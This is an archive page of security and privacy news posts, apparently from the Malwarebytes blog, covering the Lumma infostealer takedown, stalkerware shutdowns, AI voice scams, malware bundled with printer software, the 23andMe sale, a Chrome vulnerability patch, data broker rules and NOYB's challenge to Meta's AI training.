Archive for author: makoadmin

Lumma information stealer infrastructure disrupted

The US Department of Justice (DOJ) and Microsoft have disrupted the infrastructure of the Lumma information stealer (infostealer).

Lumma Stealer, also known as LummaC or LummaC2, first emerged in late 2022 and quickly established itself as one of the most prolific infostealers. Infostealers is the name we use for a group of malware that collects sensitive information from infected devices and sends the data to an operator. Depending on the type of infostealer and the goals of the operator, infostealers can be interested in taking anything from usernames and passwords to credit card details, and cryptocurrency wallets.

Lumma operates under a malware-as-a-service (MaaS) model, meaning its creators sell access to the malware on underground marketplaces and platforms like Telegram. This model allows hundreds of cybercriminals worldwide to deploy Lumma for their own malicious campaigns.

What makes Lumma particularly dangerous is its wide range of targets and its evolving sophistication. It doesn’t just grab browser-stored passwords or cookies. It’s also capable of extracting autofill data, email credentials, FTP client data, and even two-factor authentication tokens and backup codes, which enables attackers to bypass additional security layers.

As Matthew R. Galeotti, head of the Justice Department’s Criminal Division put it:

“Malware like LummaC2 is deployed to steal sensitive information such as user login credentials from millions of victims in order to facilitate a host of crimes, including fraudulent bank transfers and cryptocurrency theft.”

Over the last few months alone, Microsoft identified over 394,000 Windows computers infected with Lumma worldwide. The FBI estimates that Lumma has been involved in around 10 million infections globally.

Using a court order from the US District Court for the Northern District of Georgia, Microsoft’s DCU seized and facilitated a takedown, suspension, and blocking of approximately 2,300 malicious domains that were part of the infostealer’s backbone.

Most of the seized domains served as user panels, where Lumma customers are able to access and deploy the infostealer, so this will stop the criminals from being able to to access Lumma in order to compromise computers and steal victim information.

Government agencies and researchers sometimes alter DNS addresses to lead the traffic to their own servers (called sinkholes). By redirecting the seized domains to Microsoft-controlled sinkholes, investigators can now monitor ongoing attacks and provide intelligence to help defend against similar threats in the future. This takedown slows down cybercriminals, disrupts their revenue streams, and buys time and knowledge for defenders to strengthen security.

How to protect yourself

Even with the Lumma infrastructure disrupted, the threat of information stealers remains very real and evolving. Here are some practical steps to reduce your risk:

  • Use strong, unique passwords for every account and consider a reputable password manager to keep track of them.
  • Enable multi-factor authentication (MFA) wherever possible. Although Lumma tries to bypass 2FA, having it still adds a crucial layer of defense.
  • Be cautious with emails and downloads. Lumma often spreads through phishing emails and malicious downloads, sometimes disguised as legitimate CAPTCHAs or antivirus software.
  • Keep your software and operating system updated to patch vulnerabilities that malware can exploit.
  • Regularly monitor your financial and online accounts for suspicious activity.
  • Educate yourself about phishing and social engineering tactics to avoid falling victim to trickery.
  • Use an up-to-date real-time anti-malware solution to block install attempts and detect active information stealers.

By understanding how threats like Lumma operate and by taking the necessary steps to protect ourselves, we can reduce the risk of falling prey to these invisible thieves.

You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by a Lumma infostealer. We have many millions of stolen records stemming from Lumma stealers that are being traded on the Dark Web in our database.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Stalkerware apps go dark after data breach

A stalkerware company that recently leaked millions of users’ personal information online has taken all of its assets offline without any explanation. Now Malwarebytes has learned that the company has taken down other apps too.

Back in February, news emerged of a stalkerware app compromise. Reporters at Techcrunch revealed a vulnerability in three such apps: Spyzie, Cocospy, and Spyic. The flaw exposed data from the victim’s devices, rendering their messages, photos, and location data visible to whomever wanted them. It also gave up approximately 3.2 million email addresses entered by the customers that bought and installed these apps on their targets’ devices.

The bug was so easy to exploit that Techcrunch and the researcher involved wouldn’t divulge it, to protect the compromised details.

Now, the apps have gone dark. Techcrunch revealed that the software has stopped working, and the websites advertising it have disappeared. The spyware’s Amazon Web Services storage has also been deleted. The publication speculated that the apps, which were branded separately but looked nearly identical, were possibly shut down to avoid legal repercussions over the data leak.

Stalkerware apps are designed to hide themselves once installed on a person’s phone. They collect data including the location of the device, messages sent by the user, and their contacts.

Spyzie’s web site, now no longer available, marketed the software as a tool to keep an eye on your kids. It advertised itself as “100% hidden and invisible so you never get caught”. It also offered to collect their browser history, WhatsApp messages (including deleted ones), Facebook messages, and call logs. Spyzie claimed to have over a million users in more than 190 countries.

These aren’t the only three apps that the same organization took down. According to archived records of the Spyzie site, it was operated by FamiSoft Limited. That company also produced another app targeting kids called Teensafe (its website is also now down). Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.

Stalkerware is typically installed by those with direct access to a user’s phone or computer, and typically doesn’t need you to root or jailbreak the device. Spyzie targeted both Android and iPhone platforms. While frequently marketed as a way to keep children safe, theses are also frequently used by abusive partners or ex-partners, as explained by the Federal Trade Commission. The Coalition against Stalkerware, of which Malwabytes is a founding member, offers advice on what to do if you’re being targeted by a stalker.

There have been several instances over the years of stalkerware apps leaking data. It’s especially pernicious because in many cases it isn’t just the email addresses of the stalkerware’s customers that is compromised; it’s the personal details of the people whose phones are being spied upon.

Those people may often not be aware that they’re being surveilled, or might have been forced to install the software against their wishes. They are victimized twice: once when an individual invades their privacy, and twice when crummy infrastructure exposes their information more widely. If a customer really is using such software as a way of protecting their children, they might want to reconsider their choices.

Are you a victim of domestic abuse, or are you worried that someone else is? If you’re in the US, you can contact the National Domestic Abuse Hotline. If you’re in the UK, the government has a useful resource page to help victims and the charity Refuge operates a hotline.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Scammers are using AI to impersonate senior officials, warns FBI

The FBI has issued a warning about an ongoing malicious text and voice messaging campaign that impersonates senior US officials.

The targets are predominantly current or former US federal or state government officials and their contacts. In the course of this campaign, the cybercriminals have used test messages as well as Artificial Intelligence (AI)-generated voice messages.

After establishing contact, the criminals often send targets a malicious link which the sender claims will take the conversation to a different platform. On this messaging platform, the attacker may push malware or introduce hyperlinks that direct targets to a site under the criminals’ control in order to steal login information, like user names and passwords.

The AI-generated audio used in the vishing campaign is designed to impersonate public figures or a target’s friends or family to increase the believability of the malicious schemes. A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.”

Due to the rapid developments in AI, vishing attacks are becoming more common and more convincing. We have seen reports about callers pretending to be employers, family, and now government officials. What they have in common is that they are after information they can use to steal money or sensitive information from the victim.

How to stay safe

Because these campaigns are very sophisticated and targeted, it’s important to stay vigilant. Some recommendations:

  • Independently verify the identity of the person contacting you, via a different method.
  • Carefully examine the origin of the message. The criminals typically use software to generate phone numbers that are not attributed to a specific mobile phone or subscriber.
  • Listen closely to the tone and word choice of the caller. Do they match those of the person allegedly calling you? And pay attention to any kind of voice call lag time.
  • AI-generated content has advanced to the point that it is often difficult to identify. When in doubt about the authenticity of someone wishing to communicate with you, contact your relevant security officials or the FBI for help.

If you believe you have been the victim of the campaign described above, contact your relevant security officials and report the incident to your local FBI Field Office or the Internet Crime Complaint Center (IC3) at www.ic3.gov. Be sure to include as much detailed information as possible.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Malware-infected printer delivered something extra to Windows users

You’d hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you’d be wrong.

The Shenzen-based company sells UV printers, which are able to print on a variety of materials including wood, acrylic, tile, and plastic. They come with all kinds of attractive features. However as reviewer Cameron Coward found out, they also came with malware (at least, until recently).

Coward received a review model of the Procolored V11 pro DTO UC printer that came with software on a USB thumb drive. “One of those was the Microsoft Visual C++ Redistributable in a zip folder,” he said in a review of the product. “But as soon as I unzipped it, Windows Defender quarantined the files and informed me that it found a Floxif virus.”

Floxif is a family of malware that infects a computer and installs a backdoor, giving the attacker control of the machine and allowing them to download other malware onto the system.

Coward also tried to download the control software for the printer from Procolored’s website, which linked to the mega.nz file sharing site. When he tried to download it, Google Chrome detected a virus and blocked it.

He checked in with the vendor, who denied that there was any malware and said the virus software was spotting a false positive (when it mistakenly identifies legitimate software as malicious).

Getting a second opinion

Coward asked for help on Reddit, and Karsten Hahn, principal malware researcher for cybersecurity company G Data CyberDefense, investigated the issue. After scanning 8 GB of software files for the Procolored products, all maintained on mega.nz, Hahn found no evidence of Floxif, he reported in an account of the investigation.

He did find two malware strains in the files, though. Win32.Backdoor.XRedRAT.A is a backdoor that first cropped up in other analyses last year. It gives the attacker complete control over the victim’s PC, including letting them enter command-line instructions, log keystrokes, and download or delete files.

The second, MSIL.Trojan-Stealer.CoinStealer.H, steals cryptocurrency from victims’ machines. It replaces cryptocurrency addresses in the clipboard with the attacker’s own, which has already received around $100,000 in presumably ill-gotten funds.

Both malware files were detected by Malwarebytes’  Machine Learning component DDS as Generic.Malware.AI.DDS, so Malwarebytes/ThreatDown customers were protected against these threats.

After confronting Procolored with the evidence, the company responded to Hahn:

“The software hosted on our website was initially transferred via USB drives. It is possible that a virus was introduced during this process.”

The organization said that it had taken steps to solve the problem, including temporarily taking down all software from its website and scanning all of its files.

“Only after passing stringent virus and security checks will the software be re-uploaded. This is a top priority for us, and we are taking it very seriously.”

However, Procolored hadn’t taken things seriously before that point. Searching the internet, Coward found that many owners of Procolored machines had reported the same issue. The infected files had been up for months.

A history of bundled malware

You might not think that this story applies to you. After all, only a small subset of our readers would be interested in buying such as specialist printer. However, this isn’t the only time when a manufacturer has shipped a product riddled with malware.

2017 saw IBM accidentally ship malware on a USB key containing initialization software for its storage devices. In 2018, Schneider Electric had to warn customers that some of the USB drives shipped with its battery monitoring software were infected with malware.

In 2019, we discovered that US government program providing Android phones to low-income users was found to be shipping them with malware.

Some of these malicious products were shipped on purpose by people who should have known better. In 2005, Sony shipped hidden software on its audio CDs that installed itself on Windows computers to stop them making digital copies. Removing it rendered the Windows installation useless.

The takeaway is this: just because a company has a respected brand doesn’t mean they can’t make mistakes. Take just as much care when installing something from a ‘reliable’ source as you would when doing anything else. Security software and caution go a long way.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

23andMe and its customers’ genetic data bought by a pharmaceutical org

The bankrupt genetic testing company 23andMe has been scooped up by drug producer Regeneron Pharmaceuticals for $256 million dollars.

But why would a pharmaceutical company like Regeneron buy a bankrupt genetics testing company like 23andMe for such a large amount of money?

Well, Regeneron is a leading biotechnology company that invents, develops, and monetizes life-transforming medicines for people with serious diseases. So, it seems obvious that Regeneron’s primary interest lies in the genetic data collected by 23andMe, and the situation raises complex ethical, privacy, and security concerns that customers should understand and address.

Regeneron has pledged to uphold data privacy and security, working closely with a court-appointed Customer Privacy Ombudsman, acknowledging the importance of customer data protection and the ethical use of genetic information.

Dr. George Yancopoulos, Regeneron’s president, said in a statement:

“We believe we can help 23andMe deliver and build upon its mission to help people learn about their own DNA and how to improve their personal health, while furthering Regeneron’s efforts to improve the health and wellness of many.”

However, the scenario is less grim than the fears uttered by Senator Cassidy, chair of the US Senate Health, Education, Labor, and Pensions Committee, who expressed concerns about foreign adversaries, including the Chinese Communist Party, acquiring the sensitive genetic data of millions of Americans through 23andMe.

Regeneron already manages genetic data from nearly three million people, so 23andMe’s 15 million customers significantly expand this resource. Besides the genetic data itself, Regeneron likely values the consumer genetics business infrastructure and research services that 23andMe built, which can complement Regeneron’s pharmaceutical pipeline and personalized medicine efforts.

Genetic data is uniquely sensitive because it contains deeply personal information about an individual’s health risks, ancestry, and even family relationships. Unlike traditional medical records protected under HIPAA, 23andMe’s genetic data is covered primarily by consumer privacy laws, which offer weaker protections.

What can consumers do to protect their data?

Customers should actively manage their data on 23andMe by reviewing policies, deleting data if desired, and staying vigilant about how their sensitive genetic information is used.

People that have submitted samples to 23andMe have three different options, each providing a different level of privacy.

1. Delete your genetic data from 23andMe

For 23andMe customers who want to delete their data from 23andMe:

  • Log into your account and navigate to Settings.
  • Under Settings, scroll to the section titled 23andMe data. Select View.
  • You will be asked to enter your date of birth for extra security. 
  • In the next section, you’ll be asked which, if there is any, personal data you’d like to download from the company (make sure you’re using a personal, not public, computer). Once you’re finished, scroll to the bottom and select Permanently delete data.
  • You should then receive an email from 23andMe detailing its account deletion policy and requesting that you confirm your request. Once you confirm you’d like your data to be deleted, the deletion will begin automatically, and you’ll immediately lose access to your account. 

2. Destroy your 23andMe test sample

If you previously opted to have your saliva sample and DNA stored by 23andMe, but want to change that preference, you can do so from your account settings page, under “Preferences.”

3. Revoke permission for your genetic data to be used for research

If you previously consented to 23andMe and third-party researchers using your genetic data and sample for research, you may withdraw consent from the account settings page, under Research and Product Consents.

Check if you were caught up in the 23AndMe data breach

Additionally, you may want to check if your data was exposed in the 2023 data breach. We recommend that you run a scan using our free Digital Footprint Portal to see if your data was exposed in the breach, and then to take additional steps to protect yourself (we’ll walk you through those).


We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

How Los Angeles banned smartphones in schools (Lock and Code S06E10)

This week on the Lock and Code podcast…

There’s a problem in class today, and the second largest school district in the United States is trying to solve it.

After looking at the growing body of research that has associated increased smartphone and social media usage with increased levels of anxiety, depression, suicidal thoughts, and isolation—especially amongst adolescents and teenagers—Los Angeles Unified School District (LAUSD) implemented a cellphone ban across its 1,000 schools for its more than 500,000 students.

Under the ban, students who are kindergartners all the way through high school seniors cannot use cellphones, smartphones, smart watches, earbuds, smart glasses, and any other electronic devices that can send messages, receive calls, or browse the internet. Phones are not allowed at lunch or during passing periods between classes, and, under the ban, individual schools decide how students’ phones are stored, be that in lockers, in magnetically sealed pouches, or just placed into sleeves at the front door of every classroom, away from students’ reach.

The ban was approved by the Los Angeles Unified School District through what is called a “resolution”—which the board voted on last year. LAUSD Board Member Nick Melvoin, who sponsored the resolution, said the overall ban was the right decision to help students.  

“The research is clear: widespread use of smartphones and social media by kids and adolescents is harmful to their mental health, distracts from learning, and stifles meaningful in-person interaction.”

Today, on the Lock and Code podcast with host David Ruiz, we speak with LAUSD Board Member Nick Melvoin about the smartphone ban, how exceptions were determined, where opposition arose, and whether it is “working.” Melvoin also speaks about the biggest changes he has seen in the first few months of the cellphone ban, especially the simple reintroduction of noise in hallways.

“[During a school visit last year,] every single kid was on their phone, every single kid. They were standing there looking, texting again, sometimes texting someone who was within a few feet of them, and it was quiet.”

Tune in today to listen to the full episode.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Update your Chrome to fix serious actively exploited vulnerability

Google released an emergency update for the Chrome browser to patch an actively exploited vulnerability that could have serious ramifications.

The update brings the Stable channel to versions 136.0.7103.113/.114 for Windows and Mac and 136.0.7103.113 for Linux.

The easiest way to update Chrome is to allow it to update automatically, but you can end up lagging behind if you never close your browser or if something goes wrong—such as an extension stopping you from updating the browser.

To manually get the update, click Settings > About Chrome. If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is restart the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

Chrome up to date version 136.0.7103.114

This update is crucial since it addresses an actively exploited vulnerability which could allow an attacker to steal information you share with other websites. Google says it’s aware that knowledge of CVE-2025-4664 exists in the wild. But while Google didn’t acknowledge that the vulnerability is actually being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities catalog—a strong indication the vulnerability is being used out there.

Technical details

The vulnerability tracked as CVE-2025–4664, lies in the Chrome Loader component, which handles resource requests. When you visit a website, your browser often needs to load additional pieces of that site, such as images, scripts, or stylesheets, which may come from various sources. The Loader manages these requests to fetch and display those resources properly.

While it does that, it should enforce security policies that prevent one website from accessing data belonging to another website, a principle known as the “same-origin policy.”

The vulnerability lies in the fact that those security policies were not applied properly to Link headers. This allowed an attacker to set a referrer-policy in the Link header which tells Chrome to include full URLs, including sensitive query parameters.

This is undesirable since query parameters in full URLs often contain sensitive information such as OAuth tokens (used for authentication), session identifiers, and other private data.

Imagine you visit a website related to sensitive or financial information, and the URL includes a secret code in the address bar that proves it’s really you. Normally, when your browser loads images or other content from different websites, it keeps that secret code private. But because of this Chrome Loader flaw, a successful attacker can trick your browser into sending that secret code to a malicious website just by embedding an image or other resource there.

The attacker could, for example, embed a hidden image hosted at their own server, and harvest the full URLs. This means they can steal your private information without you realizing it, potentially letting them take over your account or other online services.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A week in security (May 12 – May 18)

Last week on Malwarebytes Labs:

Last week on ThreatDown:

Stay safe!


Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Data broker protection rule quietly withdrawn by CFPB

The Consumer Financial Protection Bureau (CFPB) has decided to withdraw a 2024 rule to limit the sale of Americans’ personal information by data brokers.

In a Federal Register notice published yesterday, the CFPB said it “has determined that legislative rulemaking is not necessary or appropriate at this time to address the subject matter”.

The data brokerage industry generates an estimated $300 billion in annual revenue. Data brokers actively collect and sell your Personally Identifiable Information (PII), including financial details, personal behavior, and interests, for profit. They often do this without seeking your consent or without making it clear that you have given consent.

The CFPB proposed the rule in December 2024 to curb data brokers from selling Americans’ sensitive personal and financial information. By restricting the sale of personal identifiers such as Social Security Numbers (SSNs) and phone numbers, the rule aimed to ensure that companies share financial data, like income, only for legitimate purposes, such as facilitating a mortgage approval, rather than selling it on to scammers who target people in financial distress.

The proposal sought to make data brokers comply with federal law and address serious threats posed by current industry practices. It targeted not only national security, surveillance, and criminal exploitation risks, but also aimed to limit doxxing and protect the personal safety of law enforcement personnel and domestic violence survivors.

The CFPB intended to treat data brokers like credit bureaus and background check companies, requiring them to comply with the Fair Credit Reporting Act (FCRA) regardless of how they use financial information. The proposal would also have required data brokers to obtain much more explicit and separately authorized consumer consent.

By setting it up this way it wouldn’t have interfered with the existing pathways created for and by the FCRA while offering more consumer protection.

However, acting CFPB Director Russell Vought said the agency had determined the rule was not for now, pointing to “updates to Bureau policies.”

Watchdog groups have a different view on the matter though. Matt Schwartz, a policy analyst at Consumer Reports, stated it would leave consumers vulnerable:

“Data brokers collect a treasure trove of sensitive information about virtually every American and sell that information widely, including to scammers looking to rip off consumers.”

If data brokers would be required to comply with the FCRA:

  • They would have to ensure the accuracy and privacy of the data they collect and share.
  • Consumers must be provided with mechanisms to dispute and correct inaccurate information.
  • Consumers should be notified when their data is used for decisions about credit, insurance, or employment.
  • They could face enforcement actions and penalties for non-compliance, as the Federal Trade Commission (FTC) and CFPB have done in the past.

We don’t just report on data privacy—we help you remove your personal information

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

Meta sent cease and desist letter over AI training

EU privacy advocacy group NOYB has clapped back at Meta over its plans to start training its AI model on European users’ data. In a cease and desist letter to the social networking giant’s Irish operation signed by founder Max Schrems, the non-profit demanded that it justify its actions or risk legal action.

In April, Meta told users that it was going to start training its generative AI models on their data.

Schrems uses several arguments against Meta in the NOYB complaint:

1. Meta’s ‘legitimate interests’ are illegitimate

NOYB continues to question Meta’s use of opt-out mechanisms rather than excluding all EU users from the process and requiring them to opt in to the scheme. “Meta may face massive legal risks – just because it relies on an “opt-out” instead of an “opt-in” system for AI training,” NOYB said on its site.

Companies who want to process personal data without explicit consent must demonstrate a legitimate interest to do so under GDPR. Meta hasn’t published information about how it justifies those interests, says Schrems. He has trouble seeing how training a general-purpose AI model could be deemed a legitimate interest because it violates a key GDPR principle; limiting data process to specific goals.

NOYB doesn’t believe that Meta can enforce GDPR rights for personal data like the right to be forgotten once an AI system is trained on it, especially if that system is an open-source one like Meta’s Llama AI model.

“How should it have a ‘legitimate interest’ to suck up all data for AI training?” Schrems said. “While the ‘legitimate interest’ assessment is always a multi-factor test, all factors seem to point in the wrong direction for Meta. Meta simply says that its interest in making money is more important than the rights of its users.”

2. What you don’t know can hurt you

Schrems warns that people who don’t have a Facebook account but just happen to be mentioned or caught in a picture on a user’s account will be at risk under Meta’s AI training plans. They might not even be aware that their information has been used to train AI, and therefore couldn’t object, he argues.

3. Differentiation is difficult

NOYB also worries that the social media giant couldn’t realistically separate people whose data is linked on the system. For example, what happens if two users are in the same picture, but one has opted out of AI training and one hasn’t? Or they’re in different geographies and one is protected under GDPR and one isn’t?

Trying to separate data gets even stickier when trying to separate ‘special category’ data, which GDPR treats as especially sensitive. This includes things like religious beliefs or sexual orientation.

“Based on previous legal submissions by Meta, we therefore have serious doubts that Meta can indeed technically implement a clean and proper differentiation between users that performed an opt-out and users that did not,” Schrems says.

Other arguments

People who have been entering their data into Facebook for the last two decades could not have been expected to know that Facebook would use their data to train AI now, the letter said. That data is private because it tries hard to protect it from web scrapers, and limits who can see it.

In any case, other EU laws would make it the proposed AI training illegal, NOYB warns. It points to the Digital Markets Act, which stops companies cross-referencing personal data between services without consent.

Meta, which says that it won’t train its AI on private user messages, had originally delayed the process altogether after pushback from the Irish Data Privacy commissioner. Last month the company said that had “engaged constructively” with the regulator. There has been no further news from the Irish DPC on the issue aside from a statement thanking the European Data Protection Board for an opinion on the matter handed down in December. That opinion left the specifics of AI training policy up to national regulators.

“We also understand that the actions planned by Meta were neither approved by the Irish DPC nor other Concerned Supervisory Authorities (CSAs) in the EU/EEA. We therefore have to assume that Meta is openly disregarding previous guidance by the relevant Supervisory Authorities (SAs),” Schrems’ letter said.

NOYB has asked Meta to justify itself or sign a cease and desist order by May 21. Otherwise, it threatens legal action by May 27, which is the date that Meta is due to start its training. If it brings an action under the EU’s new Collective Redress Scheme, it could obtain an injunction from different jurisdictions outside Ireland to shut down the training process and delete the data. A class action suit might also be possible, Schrems added.

In a statement to Reuters, Meta called NOYB “wrong on the facts and the law”, saying that gives adequate opt-out options for users.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.